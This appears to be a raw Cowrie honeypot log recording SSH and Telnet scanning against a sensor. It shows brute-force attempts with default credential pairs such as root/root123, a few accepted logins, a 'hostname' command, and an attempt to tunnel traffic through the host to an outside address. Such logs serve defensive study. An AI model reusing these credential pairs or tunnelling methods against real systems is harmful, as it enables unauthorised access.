{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16367,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3c25006ec3d","protocol":"ssh","message":"New connection: 212.227.235.229:16367 (1.2.3.4:22) [session: e3c25006ec3d]","sensor":"my-vps","timestamp":"2025-08-26T22:26:47.344350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:26:47.345114Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:26:47.471622Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"1234","message":"login attempt [Administrator/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T22:26:48.062746Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abc123","message":"login attempt [Administrator/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:26:49.191152Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abcd123","message":"login attempt [Administrator/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:26:50.319681Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abcd1234","message":"login attempt [Administrator/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T22:26:51.449770Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:26:52.243742Z","src_ip":"106.12.128.104","session":"d542a3b85a32"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"abc1234","message":"login attempt [Administrator/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-26T22:26:52.577545Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:26:53.705989Z","src_ip":"212.227.235.229","session":"e3c25006ec3d"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":37014,"dst_ip":"1.2.3.4","dst_port":22,"session":"34809bf99ea5","protocol":"ssh","message":"New connection: 3.130.96.91:37014 (1.2.3.4:22) [session: 34809bf99ea5]","sensor":"my-vps","timestamp":"2025-08-26T22:27:08.024252Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-26T22:27:08.025866Z","src_ip":"3.130.96.91","session":"34809bf99ea5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:27:08.026739Z","src_ip":"3.130.96.91","session":"34809bf99ea5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55126,"dst_ip":"1.2.3.4","dst_port":22,"session":"07c59b7c3301","protocol":"ssh","message":"New connection: 217.72.205.35:55126 (1.2.3.4:22) [session: 07c59b7c3301]","sensor":"my-vps","timestamp":"2025-08-26T22:27:09.594523Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:27:09.595736Z","src_ip":"217.72.205.35","session":"07c59b7c3301"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36198,"dst_ip":"1.2.3.4","dst_port":22,"session":"faae6aac1c1f","protocol":"ssh","message":"New connection: 212.227.235.229:36198 (1.2.3.4:22) [session: faae6aac1c1f]","sensor":"my-vps","timestamp":"2025-08-26T22:28:28.178572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:28:29.353079Z","src_ip":"212.227.235.229","session":"faae6aac1c1f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:28:29.354169Z","src_ip":"212.227.235.229","session":"faae6aac1c1f"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123qwe","message":"login attempt [dspace/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T22:28:35.413908Z","src_ip":"212.227.235.229","session":"faae6aac1c1f"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:28:38.154913Z","src_ip":"212.227.235.229","session":"faae6aac1c1f"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":46632,"dst_ip":"1.2.3.4","dst_port":22,"session":"69b355ae4b60","protocol":"ssh","message":"New connection: 3.130.96.91:46632 (1.2.3.4:22) [session: 69b355ae4b60]","sensor":"my-vps","timestamp":"2025-08-26T22:29:21.282910Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T22:29:21.283884Z","src_ip":"3.130.96.91","session":"69b355ae4b60"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:29:21.284617Z","src_ip":"3.130.96.91","session":"69b355ae4b60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36036,"dst_ip":"1.2.3.4","dst_port":23,"session":"ac95870ac3dc","protocol":"telnet","message":"New connection: 212.227.235.229:36036 (1.2.3.4:23) [session: ac95870ac3dc]","sensor":"my-vps","timestamp":"2025-08-26T22:29:24.549906Z"}
{"eventid":"cowrie.session.closed","duration":30.575424671173096,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:29:55.125255Z","src_ip":"212.227.235.229","session":"ac95870ac3dc"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":49926,"dst_ip":"1.2.3.4","dst_port":22,"session":"43bab49b1d48","protocol":"ssh","message":"New connection: 3.130.96.91:49926 (1.2.3.4:22) [session: 43bab49b1d48]","sensor":"my-vps","timestamp":"2025-08-26T22:30:49.717191Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00037cA\u0015PU(\\x98\\xf7\\xb5f\\x8e\\x9b\\xe2\\xb3V\\xe3Z\t\\xd9L?\\xb1$\\xfef\\xba3\\xd8\\xcfJ\\x8a\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00037cA\u0015PU(\\x98\\xf7\\xb5f\\x8e\\x9b\\xe2\\xb3V\\xe3Z\t\\xd9L?\\xb1$\\xfef\\xba3\\xd8\\xcfJ\\x8a\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T22:30:49.719410Z","src_ip":"3.130.96.91","session":"43bab49b1d48"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:30:49.720285Z","src_ip":"3.130.96.91","session":"43bab49b1d48"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":59068,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0d8f076fe2a","protocol":"ssh","message":"New connection: 106.12.128.104:59068 (1.2.3.4:22) [session: f0d8f076fe2a]","sensor":"my-vps","timestamp":"2025-08-26T22:30:56.105780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:30:56.106640Z","src_ip":"106.12.128.104","session":"f0d8f076fe2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:30:56.317158Z","src_ip":"106.12.128.104","session":"f0d8f076fe2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49996,"dst_ip":"1.2.3.4","dst_port":22,"session":"de1a7338c8c0","protocol":"ssh","message":"New connection: 212.227.235.229:49996 (1.2.3.4:22) [session: de1a7338c8c0]","sensor":"my-vps","timestamp":"2025-08-26T22:31:09.445141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:31:10.247099Z","src_ip":"212.227.235.229","session":"de1a7338c8c0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:31:10.249064Z","src_ip":"212.227.235.229","session":"de1a7338c8c0"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123qwerty","message":"login attempt [dspace/123qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T22:31:14.168119Z","src_ip":"212.227.235.229","session":"de1a7338c8c0"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:31:16.233148Z","src_ip":"212.227.235.229","session":"de1a7338c8c0"}
{"eventid":"cowrie.session.connect","src_ip":"198.98.53.110","src_port":43692,"dst_ip":"1.2.3.4","dst_port":23,"session":"88955cb506c8","protocol":"telnet","message":"New connection: 198.98.53.110:43692 (1.2.3.4:23) [session: 88955cb506c8]","sensor":"my-vps","timestamp":"2025-08-26T22:31:21.742163Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36094,"dst_ip":"1.2.3.4","dst_port":23,"session":"6789823a96f1","protocol":"telnet","message":"New connection: 212.227.125.160:36094 (1.2.3.4:23) [session: 6789823a96f1]","sensor":"my-vps","timestamp":"2025-08-26T22:31:45.424071Z"}
{"eventid":"cowrie.session.closed","duration":16.679447650909424,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:02.103452Z","src_ip":"212.227.125.160","session":"6789823a96f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43080,"dst_ip":"1.2.3.4","dst_port":23,"session":"8bfb8c5eec0e","protocol":"telnet","message":"New connection: 212.227.125.160:43080 (1.2.3.4:23) [session: 8bfb8c5eec0e]","sensor":"my-vps","timestamp":"2025-08-26T22:32:05.800296Z"}
{"eventid":"cowrie.session.closed","duration":3.028668165206909,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:08.828890Z","src_ip":"212.227.125.160","session":"8bfb8c5eec0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42740,"dst_ip":"1.2.3.4","dst_port":23,"session":"b52f5f64a20c","protocol":"telnet","message":"New connection: 212.227.125.160:42740 (1.2.3.4:23) [session: b52f5f64a20c]","sensor":"my-vps","timestamp":"2025-08-26T22:32:12.200138Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43138,"dst_ip":"1.2.3.4","dst_port":23,"session":"241750183f3a","protocol":"telnet","message":"New connection: 212.227.125.160:43138 (1.2.3.4:23) [session: 241750183f3a]","sensor":"my-vps","timestamp":"2025-08-26T22:32:12.381610Z"}
{"eventid":"cowrie.session.connect","src_ip":"81.198.129.128","src_port":33879,"dst_ip":"1.2.3.4","dst_port":23,"session":"579719695c3f","protocol":"telnet","message":"New connection: 81.198.129.128:33879 (1.2.3.4:23) [session: 579719695c3f]","sensor":"my-vps","timestamp":"2025-08-26T22:32:14.014870Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43475,"dst_ip":"1.2.3.4","dst_port":22,"session":"199e4b8791f9","protocol":"ssh","message":"New connection: 212.227.125.160:43475 (1.2.3.4:22) [session: 199e4b8791f9]","sensor":"my-vps","timestamp":"2025-08-26T22:32:21.633229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:32:21.635125Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:32:21.760308Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E","message":"login attempt [root/!Q2w#E] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:32:22.244657Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:32:22.518805Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T22:32:22.519587Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:22.643462Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:22.644643Z","src_ip":"212.227.125.160","session":"199e4b8791f9"}
{"eventid":"cowrie.session.closed","duration":10.878647089004517,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:23.260178Z","src_ip":"212.227.125.160","session":"241750183f3a"}
{"eventid":"cowrie.session.closed","duration":12.501521348953247,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:26.516320Z","src_ip":"81.198.129.128","session":"579719695c3f"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:32:26.885685Z","src_ip":"198.98.53.110","session":"88955cb506c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:32:26.976641Z","src_ip":"198.98.53.110","session":"88955cb506c8"}
{"eventid":"cowrie.session.closed","duration":15.565592527389526,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:27.765633Z","src_ip":"212.227.125.160","session":"b52f5f64a20c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52830,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d52b9bd5683","protocol":"telnet","message":"New connection: 212.227.125.160:52830 (1.2.3.4:23) [session: 6d52b9bd5683]","sensor":"my-vps","timestamp":"2025-08-26T22:32:32.838510Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55706,"dst_ip":"1.2.3.4","dst_port":23,"session":"5caf47415582","protocol":"telnet","message":"New connection: 212.227.125.160:55706 (1.2.3.4:23) [session: 5caf47415582]","sensor":"my-vps","timestamp":"2025-08-26T22:32:34.071703Z"}
{"eventid":"cowrie.session.closed","duration":4.330991268157959,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:38.402602Z","src_ip":"212.227.125.160","session":"5caf47415582"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40784,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ec4746be98b","protocol":"telnet","message":"New connection: 212.227.125.160:40784 (1.2.3.4:23) [session: 8ec4746be98b]","sensor":"my-vps","timestamp":"2025-08-26T22:32:43.078531Z"}
{"eventid":"cowrie.session.closed","duration":15.626526832580566,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:48.464968Z","src_ip":"212.227.125.160","session":"6d52b9bd5683"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19346,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dafa9448f53","protocol":"ssh","message":"New connection: 212.227.235.229:19346 (1.2.3.4:22) [session: 7dafa9448f53]","sensor":"my-vps","timestamp":"2025-08-26T22:32:50.379464Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:50.380639Z","src_ip":"212.227.235.229","session":"7dafa9448f53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19725,"dst_ip":"1.2.3.4","dst_port":22,"session":"875a860ccc2e","protocol":"ssh","message":"New connection: 212.227.235.229:19725 (1.2.3.4:22) [session: 875a860ccc2e]","sensor":"my-vps","timestamp":"2025-08-26T22:32:50.543285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:32:50.544037Z","src_ip":"212.227.235.229","session":"875a860ccc2e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T22:32:50.706046Z","src_ip":"212.227.235.229","session":"875a860ccc2e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:32:51.192410Z","src_ip":"212.227.235.229","session":"875a860ccc2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T22:32:51.354914Z","session":"875a860ccc2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41792,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfd98dccf76a","protocol":"telnet","message":"New connection: 212.227.125.160:41792 (1.2.3.4:23) [session: dfd98dccf76a]","sensor":"my-vps","timestamp":"2025-08-26T22:32:51.697311Z"}
{"eventid":"cowrie.session.closed","duration":10.68194055557251,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:53.760379Z","src_ip":"212.227.125.160","session":"8ec4746be98b"}
{"eventid":"cowrie.session.closed","duration":3.033944845199585,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:32:54.731182Z","src_ip":"212.227.125.160","session":"dfd98dccf76a"}
